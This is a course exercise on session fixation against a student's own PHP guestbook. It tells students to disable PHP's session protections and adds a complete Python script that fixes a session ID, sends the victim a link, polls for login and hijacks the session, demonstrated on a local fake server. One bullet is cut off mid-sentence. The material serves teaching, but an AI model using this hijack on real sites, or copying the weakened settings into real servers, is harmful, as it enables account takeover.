Exercise: Authentication and Session Management

Implement a Session Fixation Attack on your guestbook

  • Before starting this exercise, verify that your server also accepts session IDs passed in the URL: check that your php.ini contains
    session.use_only_cookies = 0
    This setting is what makes the attack possible. It was the default in PHP releases before 5.3; since PHP 5.3 the default is 1, so you will most likely have to set it yourself. On PHP 5.5.2 or later, also leave session.use_strict_mode at its default of 0, otherwise PHP rejects any session ID it did not generate itself and the fixation fails.
  • Write a program that connects to the page of your guestbook and stores the session ID it is given (you can also do this by hand with telnet and note the session ID from the Set-Cookie header).
  • Write another program that keeps your session alive (it regularly sends requests containing the session ID to the server).
    Your program should raise an alert as soon as the user has logged in; to detect this, look for a sentence that is only present in the guestbook page once someone is logged in.
  • Send the victim a link containing the URL of the guestbook and your session ID (?PHPSESSID=1234). The user will log
  • Delete the session cookie in your own browser, then open the guestbook with the same URL (containing the same session ID): ta-da, you are logged in as your victim.
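The whole exercise carried out in one script, as an added example that is not part of the course material: step 1 records the session ID the server hands out, steps 2 and 3 keep that ID alive and alert when the login marker appears, step 4 builds the link for the victim, and step 5 reuses the fixed ID. Because it has to run offline, the script includes a constructed stand-in for the PHP guestbook (FakeGuestbook) that behaves like PHP with session.use_only_cookies = 0 and session.use_strict_mode = 0; the login marker "Welcome back,", the /login?user=NAME endpoint and the simulated victim are assumptions of this example, not the guestbook's own behaviour. Point get_session_id, keep_alive_until_login and fixation_link at your real guestbook URL and marker to run the same steps against it.

```python
"""Session-fixation exercise, attacker side. Added example, not course code.
FakeGuestbook is a constructed stand-in for the PHP guestbook: like PHP with
session.use_only_cookies = 0 and session.use_strict_mode = 0, it takes a
PHPSESSID from the URL (or cookie) as-is and creates the session if needed."""
import re
import secrets
import threading
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlencode, urlparse
from urllib.request import Request, urlopen

LOGIN_MARKER = "Welcome back,"      # assumed: text shown only to a logged-in user
SESSIONS = {}                       # sid -> {"user": name or None}, server side


class FakeGuestbook(BaseHTTPRequestHandler):
    def log_message(self, *args):   # keep the demo quiet
        pass

    def _sid(self):
        """URL parameter first (use_only_cookies = 0), then cookie, else a new ID."""
        qs = parse_qs(urlparse(self.path).query)
        if "PHPSESSID" in qs:
            return qs["PHPSESSID"][0]
        m = re.search(r"PHPSESSID=([^;]+)", self.headers.get("Cookie", ""))
        return m.group(1) if m else secrets.token_hex(16)

    def _reply(self, body):
        self.send_response(200)
        self.send_header("Set-Cookie", f"PHPSESSID={self.sid}; path=/")
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(body.encode())

    def do_GET(self):               # /guestbook.php
        self.sid = self._sid()
        sess = SESSIONS.setdefault(self.sid, {"user": None})  # use_strict_mode = 0
        body = "<h1>Guestbook</h1>"
        if sess["user"]:
            body += f"<p>{LOGIN_MARKER} {sess['user']}</p>"
        self._reply(body)

    def do_POST(self):              # /login?user=NAME (hypothetical login form)
        self.sid = self._sid()
        user = parse_qs(urlparse(self.path).query).get("user", [None])[0]
        SESSIONS.setdefault(self.sid, {"user": None})["user"] = user
        self._reply("logged in")


def get_session_id(url):
    """Step 1: connect to the guestbook and record the session ID it hands out."""
    with urlopen(url) as r:
        m = re.search(r"PHPSESSID=([^;]+)", r.headers.get("Set-Cookie", ""))
    return m.group(1) if m else None


def fixation_link(url, sid):
    """Step 4: the link sent to the victim, carrying the attacker's session ID."""
    return f"{url}?{urlencode({'PHPSESSID': sid})}"


def fetch_as(url, sid):
    """Request the page while presenting a given session ID as a cookie."""
    req = Request(url, headers={"Cookie": f"PHPSESSID={sid}"})
    with urlopen(req) as r:
        return r.read().decode()


def keep_alive_until_login(url, sid, marker=LOGIN_MARKER, interval=0.05, tries=60):
    """Steps 2-3: poll with the fixed ID so it never expires; return True (the
    alert) as soon as the login-only marker appears in the page."""
    for _ in range(tries):
        if marker in fetch_as(url, sid):
            return True
        time.sleep(interval)
    return False


def run_demo():
    """Whole attack against the fake guestbook; returns (sid, alerted, page)."""
    srv = HTTPServer(("127.0.0.1", 0), FakeGuestbook)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    base = f"http://127.0.0.1:{srv.server_address[1]}/"
    url = base + "guestbook.php"
    try:
        sid = get_session_id(url)
        link = fixation_link(url, sid)

        def victim():               # constructed victim: clicks the link, then logs in
            time.sleep(0.2)
            urlopen(link).close()   # browser now stores PHPSESSID=sid as a cookie
            urlopen(Request(base + "login?user=alice", data=b"",
                            headers={"Cookie": f"PHPSESSID={sid}"})).close()

        threading.Thread(target=victim, daemon=True).start()
        alerted = keep_alive_until_login(url, sid)
        page = urlopen(link).read().decode()   # step 5: same URL, no cookie of our own
        return sid, alerted, page
    finally:
        srv.shutdown()
```

The fake server handles requests one at a time, so the login-only marker can only become visible after the victim's login request has been fully processed; the keep-alive loop therefore doubles as the alert. Against a real guestbook the polling interval should be well below session.gc_maxlifetime, otherwise the fixed session expires before the victim uses it.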